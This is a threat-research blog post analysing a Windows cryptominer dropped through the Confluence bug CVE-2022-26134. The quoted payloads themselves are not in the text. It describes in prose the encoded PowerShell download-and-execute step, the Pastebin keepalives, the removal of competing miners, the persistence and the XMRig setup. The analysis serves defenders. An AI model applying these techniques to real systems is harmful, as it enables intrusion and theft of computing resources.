Threat Spotlight: In-depth look at a cryptominer attack exploiting the Confluence bug
In this continuation of our research on attacks attempting to exploit a zero day in Atlassian Confluence, CVE-2022-26134, we take a deeper look into one of the cryptominers seen in the attack payloads.
The original attack payload is:
It decodes to:
The PowerShell part of this command shows that this is specifically targeted at Windows systems. Decoding this further leads us to:
We were able to download wi.txt and the config and other files linked within it, and a detailed analysis follows.
Detailed analysis of XMRig cryptominer
The first section of wi.txt is shown in the screenshot below:
At the start, we see a PowerShell command similar to the payload with a base64-encoded string, and a scheduled task with a Pastebin URL.
The base64 string decodes to a PowerShell download and IEX statement, which contains a Pastebin URL. Both Pastebin URLs do not have any content in them — there are no commands being executed or similar activity. Our understanding is that these URLs are being accessed as a keepalive of sorts to show how often “wi.txt” is executed — wi.txt being the filename for the original payload. Based on the filenames for the pastes — “wi_wmi” and “wi_sch” — they perform specific functions in each case. The first one shows that the WMI commands have successfully executed, and the second shows how often the scheduled task is running. These numbers act as an indicator of how many systems are infected successfully.
This is followed by a comprehensive removal of competitors. The function named “Killer” lists multiple methods to identify and remove any competing miners running on the system. It looks for miners based on:
- Known service names
- Known process names
- Any known scheduled tasks used by other miners
- Identifying competing miners by the command line arguments
- Using netstat to identify competing miners by opened connections
Basically, it takes a very comprehensive look at the system to remove any competition to maximize available resources for the attacker’s mining operations!
After this, there is a section where the script cleans up some other Windows processes. An interesting thing here is the removal of a miner process that has been setup to run persistently through the Windows registry:
This is followed by the final section, which is running the cleanup script (clean.bat) for competitor removal and setting up the new miner:
This is the actual execution block for the script, and here you can see the download for the XMRig mining executable and its attendant configuration file.
The configuration file basically sets up the miner, and in it you can see the mining pool, username, and password:
This block does a number of things, including ensuring that the cleanup is done properly with defined error conditions and checks to ensure that the miner is running.
In all, this IP address has been serving this miner for quite some time and hasn’t been taken down so far. It is an interesting look at a thought-out, well-written miner that will ensure that it gets the maximum resources on the infected system and persists for the attacker’s profit. While we have seen this payload being deployed to exploit the Atlassian vulnerability, it is quite likely that the same payload has and will be used against other vulnerabilities as well.